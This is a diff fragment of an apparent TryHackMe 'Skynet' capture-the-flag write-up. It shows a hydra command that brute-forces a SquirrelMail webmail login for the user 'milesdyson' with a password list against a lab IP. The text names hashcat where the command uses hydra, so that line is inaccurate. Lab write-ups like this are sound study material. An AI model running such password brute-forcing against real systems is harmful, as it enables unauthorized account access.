FryggFR/WriteUp/THM-Skynet.md

 Finished
 ===============================================================
 ```

-Here the POP/IMAP server, its squirrelmail
+Here the POP/IMAP server we found previously with nmap, its squirrel mail server.

 ## Bruteforcing !

-We have an id (milesdyson) and a list of password (log1.txt)
-We can try to bruteforce the POP3/IMAP Server
+We have an id (milesdyson) and a list of passwords (log1.txt).
+We can try to bruteforce this webmail server.

-To do this, i use hashcat
+To do this, i use hashcat:
 ```
 hydra -l milesdyson -P /home/kali/Challenge/TryHackMe/Skynet/log1.txt 10.10.250.118 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect." -V
 ```
 Result:

 ```